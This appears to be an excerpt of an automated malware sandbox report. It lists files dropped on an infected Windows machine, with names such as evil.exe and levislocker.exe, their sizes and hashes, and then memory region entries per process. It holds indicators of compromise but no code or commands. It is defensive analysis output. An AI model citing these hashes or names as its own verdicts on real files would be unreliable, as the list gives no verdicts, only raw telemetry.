                          12343e2ede7dc8534a4682a007ca67b34c287d4e1f7d3565d31860d72d643ad9923b59953571e95c404a9b2951e6bdd4e6e6584f246852f02f53bd832d0bc119

                        • C:\Users\Admin\AppData\Local\Temp\Client.exe

                          Filesize

                          100KB

                          MD5

                          21560cb75b809cf46626556cd5fbe3ab

                          SHA1

                          f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

                          SHA256

                          d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

                          SHA512

                          21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

                        • C:\Users\Admin\AppData\Local\Temp\Leaf.xNet.dll

                          Filesize

                          129KB

                          MD5

                          ea87f37e78fb9af4bf805f6e958f68f4

                          SHA1

                          89662fed195d7b9d65ab7ba8605a3cd953f2b06a

                          SHA256

                          de9aea105f31f3541cbc5c460b0160d0689a2872d80748ca1456e6e223f0a4aa

                          SHA512

                          c56bd03142258c6dcb712d1352d2548a055fbb726ee200949d847cb2d23d9c52442b1435be0df0bf355701a2c1a3c47cd05b96972501f457d2d401501d33d83a

                        • C:\Users\Admin\AppData\Local\Temp\Solaris.exe

                          Filesize

                          47KB

                          MD5

                          05859c4616d5d3de2927122b4d5303b9

                          SHA1

                          7ebef99aedeb8a54fe3c70424282e462df954ef6

                          SHA256

                          af51004a01329780e0cf6c04a389de96163e61aa004833cff7d59abef2a053a6

                          SHA512

                          d73f6b8a9313a727931135107f800e8885d0e471aaccf1461928a50c6c2a4e2921a1ae6eff8a2a1755656af3cb380782a7e0744573bc29691d0e964c32920d15

                        • C:\Users\Admin\AppData\Local\Temp\TEST.exe

                          Filesize

                          37KB

                          MD5

                          ca70b79092c1b1e6dc8eb7950864b0ee

                          SHA1

                          3396cebc62c348fc96463a73a40eb4e5e6bc09c5

                          SHA256

                          2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

                          SHA512

                          9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

                        • C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe

                          Filesize

                          2.4MB

                          MD5

                          240b2940002c38ebb3df80246920a729

                          SHA1

                          ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467

                          SHA256

                          552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d

                          SHA512

                          d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1

                        • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe

                          Filesize

                          33KB

                          MD5

                          a7878575f2e9f431c354c17a3e768fd9

                          SHA1

                          1824b6cb94120af47a0540af88bfc51435a4c20d

                          SHA256

                          375552e53a0c25aa36cd66827b97f7576177d1fa81efd978a55b2ec93a5b5fdd

                          SHA512

                          4f9de23fc13f414c8d6c82a7cd9ef5dfa2e7855ba642b745f62ad8b4af8dccd9269b4dec5468632af0ff5353b0d4c8e85f758ea794469f355f762cb1cc747019

                        • C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe.config

                          Filesize

                          184B

                          MD5

                          cc46a0995713ba7cb577b4bbbedf83e8

                          SHA1

                          6cc50a0e444e33f65d42423195ed045a3a55daf8

                          SHA256

                          5fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e

                          SHA512

                          36f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm3f5sdc.iau.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168

                          Filesize

                          67KB

                          MD5

                          ed10995a048cad2427dcf3d647fe0358

                          SHA1

                          f8bf2952b94dfb4aa36cf70fa982f2177197e485

                          SHA256

                          2e42395d6ab6687f6e6881851a4eec7bc97baac18a8fe5509b9c6379fda06659

                          SHA512

                          934e6424512e130f5d2977d7639c732b1c3618e27303dc34411e5cf0da7b72f4253f394ec588807585276e39a20c9cca896d29f93866a8c4ffaa35d14e0d64fe

                        • C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Lamellicornous.Oph

                          Filesize

                          482KB

                          MD5

                          39edd976e247de8857c6b9a8ee5993d0

                          SHA1

                          e0cf4208c384bc8cdb6a4b950dabdb0dfe8132c6

                          SHA256

                          9cf86f10d032b4e6cf9f69802f1dd88d0ed6bff35f76c42273ff7e9faa257959

                          SHA512

                          fb6b74210ad1a03a1218d676408a286a5f824cbcc9c019cac05b3fd45969a36243dc92d0a421c2ed459d187c4b48a0faf269aa29bd267915a92608714c51ab30

                        • C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe

                          Filesize

                          3.8MB

                          MD5

                          0f597e254135a708137a52470943316c

                          SHA1

                          86240613459d76fff43d9995f73c97f75ee680c1

                          SHA256

                          8763150d50e887141961f8c027acf92d5698e8e925cc5e76515d6d8fe330cb26

                          SHA512

                          408fe3bd85921cdf5576caa55e28213849c07340817c33605a68fa3da72ae512c0ac710b3a3cb4cbff44c5f64cfb0715034604a5de7bf9c5b6adce4919a2f6eb

                        • C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe

                          Filesize

                          9KB

                          MD5

                          757c3888ff96ebc33c2be55f648b8446

                          SHA1

                          4be04b6713b83d5e6fb48620a11629a1735dc273

                          SHA256

                          73d673b3175a1dc7e77b01537a6de77d1f78c9afc063eab263fd0c24848feb93

                          SHA512

                          421d6dcaf8031565fd5eb9a11bd167f9bc198e8622386dcba81354800eb13d533f045c0ae29de05d0d275bba151b5a932aa70f2c5e8b3c073e16170ec2b3e840

                        • C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe

                          Filesize

                          15KB

                          MD5

                          eed739fea0bc483844ddf8ddcce053d0

                          SHA1

                          06e3c942854aa1651069d99279f7f61f7dd6470d

                          SHA256

                          72b8b1fb511bbc8c3d883a1b6fa0ad55a731bda7585ab1f5670ab6a5d7a36225

                          SHA512

                          0c6621efca8b6b23e10ea6e6db6e7bc16596fb2bed72b703d460ac8b2deb388d6fae9bc8a47a139ab08349546b7c743cd7097aea21c55d469f45a655fb4c32b2

                        • C:\Users\Admin\AppData\Local\Temp\error.exe

                          Filesize

                          10KB

                          MD5

                          bcdc1a6f1805a6130dfd1913b1659bc2

                          SHA1

                          f4b80ac7fe17332f916ce450d29f7ce671e49bb0

                          SHA256

                          78e706c684da0134ace5fdd5cc5e7263c5f17b905d783f928eb68d558116aac6

                          SHA512

                          0769ecf207e224ceceba33854b457d4389897163037b91141b958762304f64e75af32679c4d6ea88c4cf02aaadde077fef048837ef280a13948e82d69b6358b4

                        • C:\Users\Admin\AppData\Local\Temp\evil.exe

                          Filesize

                          23KB

                          MD5

                          0e0d73422110762ad112c39647865d09

                          SHA1

                          4bb94e94e65a8bc12313783df99b96d89d7fd764

                          SHA256

                          02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

                          SHA512

                          e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

                        • C:\Users\Admin\AppData\Local\Temp\javawvd.exe

                          Filesize

                          36KB

                          MD5

                          bb13e4ebdcb3e7d6bcd78601fd01b654

                          SHA1

                          4165ceda368602fb21495c55a95548b7056f4413

                          SHA256

                          55385f8be83a7e193390aa5c3a9a9934e603d6d3d164e5f496ece0ad553e9027

                          SHA512

                          48ad4c2e17a7eea58c9c8ca47a68e129f889c117ddcdfffb12cf478f4b40223df1b923367309898de219a2dc7b4e95f470f7297c1d60913c59c8acb4db6f50e0

                        • C:\Users\Admin\AppData\Local\Temp\levislocker.exe

                          Filesize

                          914KB

                          MD5

                          f20c3ceba1ac2530208c3e7b9f954286

                          SHA1

                          8bae89f6d3b8376048643397408e63942fd66f27

                          SHA256

                          ef2dfff6121e80e3fa88f86da7941f3e9a613f1ed43188be1d8df0a9b39c33cd

                          SHA512

                          8a7a63da9ac92469f8c2f1114693777e46836a6e2caeca255c21d49c385af58dad7f43264c14cc62aa65affbe0b2e528a9989129cc476b1d7d5c44c80616202c

                        • C:\Users\Admin\AppData\Local\Temp\malecus.exe

                          Filesize

                          15KB

                          MD5

                          0e741eb3f92a7a739628d04a5fd4aab9

                          SHA1

                          87a8865773a791ab3ca68201cee7a0c3fef2fab3

                          SHA256

                          1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

                          SHA512

                          1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

                        • C:\Users\Admin\AppData\Local\Temp\ss.exe

                          Filesize

                          202KB

                          MD5

                          e61bc4ecaac4354b240d56fa48c67790

                          SHA1

                          c8c83c518188d7adf2a2a485b20e033a6f8a0602

                          SHA256

                          4f4732e54644b08be1c2ac9851fb21c947570d674083e9f614f3cbeef3ccf1e6

                          SHA512

                          4bec8a6067b1aa9f2b25559c5bac61aa45b90619fb713432824e9e8bd2c06e4193acab18031c7df9eb643bc17b3aa0807b49ce790b13870248f8907ad89c6ccc

                        • C:\Users\Admin\AppData\Local\Temp\tmp1D57.tmp.bat

                          Filesize

                          170B

                          MD5

                          bbb2affd7760d66aeb5c4417d93e6220

                          SHA1

                          0c3a953675a7b4db33bfe4547caeba0671fd63ef

                          SHA256

                          8593702c8a886a82bd277479f8edb74b2acfab677df654b53091c0cb35728c40

                          SHA512

                          2db360ebc2fe59531cd7ab8d2722df57e8b94da5877431f6253d2927a5ff8a3ed95ae5709adc71cfb970dddc9eb5ac053fdcc0cde453d2e4a3a948852ec2ef94

                        • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe

                          Filesize

                          2.6MB

                          MD5

                          1ae941df730e6236b0ad377266f259e7

                          SHA1

                          810424a96499b39822552a9d6bd83cebedd98d40

                          SHA256

                          21b1e961b6f5c2e05d1312c685b54c44261f0742331851a71fb56a01c6bd2847

                          SHA512

                          285ff5e451796a5a87bfb948da34ac598ff5ad2eba674b7b22db3176c7c6f4315e27884a2d5fddd664aac7c9ab93617856a96ff72c355c4054ebfa6fb5edd070

                        • C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe

                          Filesize

                          2.1MB

                          MD5

                          114bb583f6b81b9f88c233a61a62aef2

                          SHA1

                          22173c3e46fcc76287e8eeb237827954cf2db01f

                          SHA256

                          c500e5edf70c0ebe3dc69ab8c5e52204376d80e145c421441f3dec17181a2bc0

                          SHA512

                          796f5434746b786065fa99ca38901e6f8b9e5057c99308aca962e69a6336d5a6eb2e897aeaea2dee60277f08858d09b45dc2f51f3ac137d6db3e2ab63042be61

                        • C:\Windows\xdwd.dll

                          Filesize

                          136KB

                          MD5

                          16e5a492c9c6ae34c59683be9c51fa31

                          SHA1

                          97031b41f5c56f371c28ae0d62a2df7d585adaba

                          SHA256

                          35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

                          SHA512

                          20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

                        • memory/452-250-0x0000000007C70000-0x00000000082EA000-memory.dmp

                          Filesize

                          6.5MB

                        • memory/452-123-0x0000000005390000-0x00000000053F6000-memory.dmp

                          Filesize

                          408KB

                        • memory/452-234-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

                          Filesize

                          304KB

                        • memory/452-121-0x0000000004B50000-0x0000000004B72000-memory.dmp

                          Filesize

                          136KB

                        • memory/452-286-0x00000000082F0000-0x000000000AAD4000-memory.dmp

                          Filesize

                          39.9MB

                        • memory/452-98-0x0000000004B80000-0x00000000051A8000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/452-233-0x0000000005A10000-0x0000000005A2E000-memory.dmp

                          Filesize

                          120KB

                        • memory/452-143-0x0000000005400000-0x0000000005754000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/452-82-0x0000000002480000-0x00000000024B6000-memory.dmp

                          Filesize

                          216KB

                        • memory/452-122-0x0000000005320000-0x0000000005386000-memory.dmp

                          Filesize

                          408KB

                        • memory/452-237-0x00000000069F0000-0x0000000006A86000-memory.dmp

                          Filesize

                          600KB

                        • memory/452-238-0x0000000005F50000-0x0000000005F6A000-memory.dmp

                          Filesize

                          104KB

                        • memory/452-239-0x0000000005FA0000-0x0000000005FC2000-memory.dmp

                          Filesize

                          136KB

                        • memory/1492-97-0x0000000000400000-0x000000000040D000-memory.dmp

                          Filesize

                          52KB

                        • memory/1492-278-0x0000000000400000-0x000000000040D000-memory.dmp

                          Filesize

                          52KB

                        • memory/1548-236-0x0000000000400000-0x0000000000DDE000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/1548-232-0x0000000000400000-0x0000000000DDE000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/1560-35-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/1560-271-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/1752-120-0x0000000000790000-0x00000000007B0000-memory.dmp

                          Filesize

                          128KB

                        • memory/2516-173-0x00000000050B0000-0x000000000514C000-memory.dmp

                          Filesize

                          624KB

                        • memory/2516-184-0x0000000005700000-0x0000000005CA4000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/2516-191-0x00000000051F0000-0x0000000005282000-memory.dmp

                          Filesize

                          584KB

                        • memory/2516-210-0x0000000005150000-0x000000000515A000-memory.dmp

                          Filesize

                          40KB

                        • memory/2516-172-0x0000000000710000-0x00000000007FA000-memory.dmp

                          Filesize

                          936KB

                        • memory/2516-212-0x0000000005380000-0x00000000053D6000-memory.dmp

                          Filesize

                          344KB

                        • memory/2680-635-0x00000000008E0000-0x0000000001B34000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/2680-690-0x00000000008E0000-0x0000000001B34000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/2680-723-0x00000000008E0000-0x0000000001B34000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/2680-787-0x00000000008E0000-0x0000000001B34000-memory.dmp

                          Filesize

                          18.3MB

                        • memory/2988-279-0x0000000000400000-0x0000000000413000-memory.dmp

                          Filesize

                          76KB

                        • memory/3004-89-0x0000000000F90000-0x000000000137B000-memory.dmp

                          Filesize

                          3.9MB

                        • memory/3004-267-0x0000000000F90000-0x000000000137B000-memory.dmp

                          Filesize

                          3.9MB

                        • memory/3336-816-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3336-753-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3336-663-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3336-587-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3336-586-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3336-489-0x00000000001B0000-0x0000000000BFB000-memory.dmp

                          Filesize

                          10.3MB

                        • memory/3864-229-0x00000000749B0000-0x0000000074F61000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/3864-0-0x00000000749B2000-0x00000000749B3000-memory.dmp

                          Filesize

                          4KB

                        • memory/3864-1-0x00000000749B0000-0x0000000074F61000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/3864-2-0x00000000749B0000-0x0000000074F61000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/3864-228-0x00000000749B2000-0x00000000749B3000-memory.dmp

                          Filesize

                          4KB

                        • memory/3864-230-0x00000000749B0000-0x0000000074F61000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/3916-273-0x0000000007B60000-0x0000000007B74000-memory.dmp

                          Filesize

                          80KB

                        • memory/3916-264-0x00000000077F0000-0x0000000007893000-memory.dmp

                          Filesize

                          652KB

                        • memory/3916-268-0x0000000007B10000-0x0000000007B21000-memory.dmp

                          Filesize

                          68KB

                        • memory/3916-274-0x0000000007BA0000-0x0000000007BBA000-memory.dmp

                          Filesize

                          104KB

                        • memory/3916-263-0x0000000006BD0000-0x0000000006BEE000-memory.dmp

                          Filesize

                          120KB

                        • memory/3916-253-0x0000000072520000-0x000000007256C000-memory.dmp

                          Filesize

                          304KB

                        • memory/3916-252-0x00000000077B0000-0x00000000077E2000-memory.dmp

                          Filesize

                          200KB

                        • memory/3916-272-0x0000000007B50000-0x0000000007B5E000-memory.dmp

                          Filesize

                          56KB

                        • memory/3916-265-0x0000000007990000-0x000000000799A000-memory.dmp

                          Filesize

                          40KB

                        • memory/3916-275-0x0000000007B90000-0x0000000007B98000-memory.dmp

                          Filesize

                          32KB

                        • memory/4508-585-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-662-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-815-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-814-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-784-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-613-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4508-553-0x00007FF6C0B80000-0x00007FF6C0E0D000-memory.dmp

                          Filesize

                          2.6MB

                        • memory/4704-754-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-69-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-694-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-251-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-410-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-588-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-514-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-276-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-289-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4704-827-0x0000000000400000-0x000000000048A000-memory.dmp

                          Filesize

                          552KB

                        • memory/4772-209-0x0000000000610000-0x000000000061E000-memory.dmp

                          Filesize

                          56KB

                        • memory/5032-367-0x0000000000300000-0x000000000030E000-memory.dmp

                          Filesize

                          56KB

                        • memory/5032-371-0x0000000004980000-0x00000000049A6000-memory.dmp

                          Filesize

                          152KB